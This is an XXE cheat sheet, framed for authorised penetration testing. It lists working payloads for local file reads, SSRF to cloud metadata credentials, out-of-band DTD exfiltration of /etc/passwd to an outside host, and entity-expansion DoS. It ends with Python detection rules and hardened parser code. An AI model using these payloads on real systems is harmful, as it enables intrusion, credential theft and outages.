CyberCheatsheets

XXE (XML External Entity) Cheat Sheet

XML External Entity payloads for file read, SSRF, blind out-of-band exfiltration, and denial of service on authorized targets.

Web Application Security | injection | owasp | web | xml | xxe | Updated 2026-06-17

Overview

XXE abuses XML parsers that resolve external entities. If an endpoint accepts XML (SOAP, SAML, file uploads, REST with Content-Type: application/xml), you can define an external entity to read local files, reach internal services (SSRF), or exfiltrate data out-of-band when output isn't reflected. Always test by injecting a DOCTYPE with a custom entity.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Detect & read a local file

Classic file read — replace a reflected value with &xxe;

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><name>&xxe;</name></root>

Windows target file

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>

Base64 wrapper to read PHP source (the encoded output avoids XML parse errors caused by the file's own markup)

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>

SSRF via XXE

Hit the cloud metadata endpoint

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]>

Reach an internal-only service

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://10.0.0.5:8080/internal">]>

Blind / out-of-band (OOB)

External DTD hosted on your server (evil.dtd)

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://10.10.14.5/?x=%file;'>">
%eval;
%exfil;

In-band stub that pulls the malicious DTD

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.5/evil.dtd"> %xxe;]>
<root>x</root>

Confirm OOB with a simple callback first

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.5/ping"> %xxe;]>

Variations & bypasses

Switch encoding to bypass naive keyword filters

<?xml version="1.0" encoding="UTF-16"?>

SVG upload XXE (image parsers often resolve entities)

<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><svg>&xxe;</svg>

SOAP request injection point

<soap:Body>...<!DOCTYPE ...>...&xxe;...</soap:Body>

If errors are verbose, error-based XXE can leak file contents in the error message

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Billion laughs (DoS — lab only)

Entity expansion DoS

<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">...]>

Destructive — only in an authorized, isolated lab.

Tips

  • If the value isn't reflected, go out-of-band: host an external DTD and exfiltrate to your server.
  • Use php://filter base64 when reading files that would otherwise break XML parsing.
  • Try changing Content-Type to application/xml on JSON endpoints — some parsers accept both.
  • Fix = disable DOCTYPE declarations and external entity resolution in the XML parser (note it in your report).
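A defender-side companion to the Tips above, added here and not part of the original cheat sheet: a request-body check that flags the payload shapes listed on this page (decoding BOM-marked UTF-16 first, so the encoding-switch bypass does not evade it) and a Python expat parser configured as the last tip recommends, refusing any DOCTYPE before an entity can be resolved. The sample bodies are constructed from the page's payloads; the rule names, the `rejects` helper and the entity-count threshold are assumptions of this example.

```python
import re
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET

# Detection: indicators for the payload shapes on this page. The body is decoded first
# (UTF-8, or BOM-marked UTF-16) so the encoding-switch bypass does not hide a DOCTYPE.
_RULES = [
    ("doctype", re.compile(r"<!DOCTYPE", re.I)),
    ("external-entity", re.compile(r"<!ENTITY\s+(?:%\s*)?\w+\s+(?:SYSTEM|PUBLIC)\b", re.I)),
    ("parameter-entity", re.compile(r"<!ENTITY\s+%", re.I)),  # OOB / DTD-pulling stubs
    ("local-file", re.compile(r"SYSTEM\s*[\"'](?:file:|php://)", re.I)),
    ("cloud-metadata", re.compile(r"169\.254\.169\.254")),
]

def xxe_indicators(body: bytes) -> list:
    """Names of the rules a request body trips; an empty list means nothing seen."""
    utf16 = body[:2] in (b"\xff\xfe", b"\xfe\xff")
    text = body.decode("utf-16") if utf16 else body.decode("utf-8", errors="replace")
    hits = [name for name, rx in _RULES if rx.search(text)]
    if len(re.findall(r"<!ENTITY", text, re.I)) > 4:  # tunable; bombs declare a chain
        hits.append("entity-expansion")
    return hits

class UnsafeXML(ValueError):
    """The document declared a DOCTYPE or referenced an external entity."""

def parse_untrusted(body: bytes) -> ET.Element:
    """Mitigation from the Tips section on expat: no DOCTYPE, no parameter or external entities."""
    p = expat.ParserCreate()
    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} rejected (SYSTEM={sysid!r})")
    def reject_external(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity {sysid!r} refused")
    p.StartDoctypeDeclHandler = reject_doctype
    p.ExternalEntityRefHandler = reject_external
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    p.Parse(body, True)         # a DOCTYPE aborts here, before any entity is expanded
    return ET.fromstring(body)  # same bytes, now known to carry no DTD

def rejects(body: bytes) -> bool:  # True when parse_untrusted refuses the body
    try:
        parse_untrusted(body)
        return False
    except UnsafeXML:
        return True

# Constructed samples following the payload shapes shown above (not captured traffic).
FILE_READ = b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><name>&xxe;</name></root>'
OOB_STUB = b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.5/evil.dtd"> %xxe;]><root>x</root>'
CLEAN = b'<?xml version="1.0"?><root><name>alice</name></root>'
```

Rejecting the DOCTYPE wholesale is the simplest robust setting; if an application genuinely needs internal DTDs, keep the external-entity and parameter-entity handlers and only relax the DOCTYPE check.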
